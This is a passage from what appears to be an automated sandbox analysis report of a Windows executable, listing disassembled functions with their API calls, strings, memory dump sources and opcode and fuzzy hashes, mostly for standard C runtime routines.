                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                        • String ID: csm
                                                        • API String ID: 2466640111-1018135373
                                                        • Opcode ID: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                        • Instruction ID: 47935996be43f89713c155a924e88f634ba27dc2a1c8a28ac67f458d878a7763
                                                        • Opcode Fuzzy Hash: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                        • Instruction Fuzzy Hash: AF51363661974687E720EF16E58027EB7A4FB88B94F400135EB9D07B96DF38E460CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D97834 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                        • String ID: U
                                                        • API String ID: 2456169464-4171548499
                                                        • Opcode ID: 2f706e73b6f803897afdeedd5c6f9beaf88812da98874b118221d5eca08fcff9
                                                        • Instruction ID: e74f7557083efb29907bb21cc2dbf0d8ca67ef2ea23c98c3c4a6c017b50e4ee0
                                                        • Opcode Fuzzy Hash: 2f706e73b6f803897afdeedd5c6f9beaf88812da98874b118221d5eca08fcff9
                                                        • Instruction Fuzzy Hash: 4041A022B19A45D2EB20AF26E8843B9B7A1FB88794F814135EF5D87788DF3CD441C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7CCAC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ObjectRelease
                                                        • String ID:
                                                        • API String ID: 1429681911-3916222277
                                                        • Opcode ID: 44c77fb0c881ba99751d99cab6f2a4cb2265e5a1d1bd1f8fbaa2d73aad56a42c
                                                        • Instruction ID: 7b5e278ff3f1689e5511a6d2ecef071bf9a5efbdc5f4a579f1ca74294effa4ce
                                                        • Opcode Fuzzy Hash: 44c77fb0c881ba99751d99cab6f2a4cb2265e5a1d1bd1f8fbaa2d73aad56a42c
                                                        • Instruction Fuzzy Hash: B531283671874187DB149F23F84876AB6A1F788FD1F504139EF9A43B94DE3CD0498A80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7C1DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CapsDeviceRelease
                                                        • String ID:
                                                        • API String ID: 127614599-3916222277
                                                        • Opcode ID: f39d4aaa32b0f0035c213a3f2668141cc8a749a99fd2638b01b0a4ed9b2b3d7d
                                                        • Instruction ID: 4918b38faaacd8d3ccf592b18e5cac8cd717995c866e6090ced47ba4df827b47
                                                        • Opcode Fuzzy Hash: f39d4aaa32b0f0035c213a3f2668141cc8a749a99fd2638b01b0a4ed9b2b3d7d
                                                        • Instruction Fuzzy Hash: CFE08C21B0864183EB686BB6F5C912AA2A1AB4CBD0F954039DB1E837C4ED3DC4854380
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D67644 Relevance: 6.3, APIs: 4, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FoldString_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2025052027-0
                                                        • Opcode ID: 288d887226528570286da00368890b9c12e33c721ffc9314224fe1766da8ebad
                                                        • Instruction ID: 29345971f6cdde9a852a3157f0b289fc09db2ae4330e28c8fcaba35c9dc5feae
                                                        • Opcode Fuzzy Hash: 288d887226528570286da00368890b9c12e33c721ffc9314224fe1766da8ebad
                                                        • Instruction Fuzzy Hash: B4B1D122F28A4AE2EB10AF5BD494569B3A1FB45B94F908131DB2D077D0DF7CE484C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6FC98 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID:
                                                        • API String ID: 1452528299-0
                                                        • Opcode ID: 008e9068468195d1ad8d288de58e97b834aaa93408792d802f4b4f6273b3b4d6
                                                        • Instruction ID: 9adf2b0dcddb1af80bdfbd5016a9ba0557140771b06da190ab8f61882cb65565
                                                        • Opcode Fuzzy Hash: 008e9068468195d1ad8d288de58e97b834aaa93408792d802f4b4f6273b3b4d6
                                                        • Instruction Fuzzy Hash: 6551B362B14E46A6EB00BF26D4852EC7321FB85B88F804135DB6C577DAEE2CE541C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7D8C8 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                        • String ID:
                                                        • API String ID: 1077098981-0
                                                        • Opcode ID: ca84554f8b83525ab0a772656818ef73ccc777e3a16219d34c0a377584f1fe82
                                                        • Instruction ID: 9359d9ca78b841ff1e286738475666655fa98243455614459a87cc411475863d
                                                        • Opcode Fuzzy Hash: ca84554f8b83525ab0a772656818ef73ccc777e3a16219d34c0a377584f1fe82
                                                        • Instruction Fuzzy Hash: DD516232728B4287E750AF22E4847AEB3A4FB95B84F901135DB5E57A98DF3CD504CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D9102C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                        • String ID:
                                                        • API String ID: 4141327611-0
                                                        • Opcode ID: 121a64c51188f3446642135f8cc11aca021b0cf9c3d40bc74ea66e71a3f826c1
                                                        • Instruction ID: 2e2bfcdee5d258a897401c7665f4f01ced0112a4155ea0bb4f18d9553ba046a2
                                                        • Opcode Fuzzy Hash: 121a64c51188f3446642135f8cc11aca021b0cf9c3d40bc74ea66e71a3f826c1
                                                        • Instruction Fuzzy Hash: B241A221B0979257FB61AE13E88037DF294EF40B94F944130DBAC96AD6DF3ED84186A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D93FC8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7F4D8F8FB), ref: 00007FF7F4D93FE1
                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7F4D8F8FB), ref: 00007FF7F4D94043
                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7F4D8F8FB), ref: 00007FF7F4D9407D
                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7F4D8F8FB), ref: 00007FF7F4D940A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                        • String ID:
                                                        • API String ID: 1557788787-0
                                                        • Opcode ID: 31d98922058b437aa39038ffcd2f921eb2876f5cb57b8945f77e4444b2cf6093
                                                        • Instruction ID: 9d6da311f79a3cbd7db774d29167f98f444a30d80f81ba44ba2cbe0709da6004
                                                        • Opcode Fuzzy Hash: 31d98922058b437aa39038ffcd2f921eb2876f5cb57b8945f77e4444b2cf6093
                                                        • Instruction Fuzzy Hash: 3F214321B1D75586E724AF13A880029B6A4FB44B90B884135DFADA3BD6DF3CE491C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D90910 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F4D8B340,?,?,00000050,00007FF7F4D8D381), ref: 00007FF7F4D9091A
                                                        • SetLastError.KERNEL32(?,?,?,00007FF7F4D8B340,?,?,00000050,00007FF7F4D8D381), ref: 00007FF7F4D90982
                                                        • SetLastError.KERNEL32(?,?,?,00007FF7F4D8B340,?,?,00000050,00007FF7F4D8D381), ref: 00007FF7F4D90998
                                                        • abort.LIBCMT ref: 00007FF7F4D9099E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$abort
                                                        • String ID:
                                                        • API String ID: 1447195878-0
                                                        • Opcode ID: d23b1ea948c8cc0bb87b14db0d81ebe09fd71346baca008a5f7c6a6520cdbb6e
                                                        • Instruction ID: 322ebc87d86641e53cb5ae6bf234616416c04d6d98440f8feb847a57bc1c93c6
                                                        • Opcode Fuzzy Hash: d23b1ea948c8cc0bb87b14db0d81ebe09fd71346baca008a5f7c6a6520cdbb6e
                                                        • Instruction Fuzzy Hash: 0C016111B0920753FB5ABF63EDD5178B1915F45780F881538DB7E827D6EE2CF80482A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7C18C Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 0607dc1d94c92cfa02f60fd2766947dea058399673a1dc8102f04d351872c6bf
                                                        • Instruction ID: 33374f08f681d7f23319330091a98cf7b833b7ae7402b7aab5e1a14c030a22a2
                                                        • Opcode Fuzzy Hash: 0607dc1d94c92cfa02f60fd2766947dea058399673a1dc8102f04d351872c6bf
                                                        • Instruction Fuzzy Hash: 64E0C960E1960287EF286F72E8A9275B191AF48B91F844039CB2E463D0ED3DA08546E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D916C4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: e+000$gfff
                                                        • API String ID: 3215553584-3030954782
                                                        • Opcode ID: b0595cce0df0af71658d8d5e6ed85b764f27a28e19a233f7f6f9d231745c495e
                                                        • Instruction ID: 65b71d847daf80f7a645919568fbc8e3724c5978752b3bf5f077858b724cf9d0
                                                        • Opcode Fuzzy Hash: b0595cce0df0af71658d8d5e6ed85b764f27a28e19a233f7f6f9d231745c495e
                                                        • Instruction Fuzzy Hash: D051F262B187C297F7259E36D98036DBA95AB80B90F888231C7A887BD6CE3CD444C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D69808 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                        • String ID: SIZE
                                                        • API String ID: 449872665-3243624926
                                                        • Opcode ID: d0299518721ae56135b80f6d0b9407474becaff91557af36d9802fd85649bbcc
                                                        • Instruction ID: 48a90e874e7a7eb1cebff545352483e6aa2ba6e405d432649ef01b497453fcc2
                                                        • Opcode Fuzzy Hash: d0299518721ae56135b80f6d0b9407474becaff91557af36d9802fd85649bbcc
                                                        • Instruction Fuzzy Hash: CF41A462A18A8297EF10AF16E4C13BDB350FF867A4F905232E7AD066D6EE3CD540C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8F760 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, xrefs: 00007FF7F4D8F799
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                        • String ID: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                                        • API String ID: 3307058713-2009292320
                                                        • Opcode ID: 32830429c5a0a6449ebe3119d6f4074da373c825f732ffc243a16f3f58d0938d
                                                        • Instruction ID: 51bc21b72ef0247237ed04348f6c54f100350c3940339863e4ce3b42de633d2a
                                                        • Opcode Fuzzy Hash: 32830429c5a0a6449ebe3119d6f4074da373c825f732ffc243a16f3f58d0938d
                                                        • Instruction Fuzzy Hash: 2A415272A0865687E715EF27E8800B8B7A5FB44BD4F944036EB1D47BD5EE3DE44183A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D69A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_snwprintf
                                                        • String ID: $%s$@%s
                                                        • API String ID: 2650857296-834177443
                                                        • Opcode ID: 18d1f9567af3e1e829b7edd42c7bfbbb79181edea22946e9fa38abe24f4e2d02
                                                        • Instruction ID: 7420976095a2ddcad02fa565ff6492ab9f9c488f6ce99a5dae86f09a742663b8
                                                        • Opcode Fuzzy Hash: 18d1f9567af3e1e829b7edd42c7bfbbb79181edea22946e9fa38abe24f4e2d02
                                                        • Instruction Fuzzy Hash: 7E31AE72618A4A96EB10AF17E4C06B9B3A4FB44788F800032EF1D17BD5DE3CE505C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D91FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
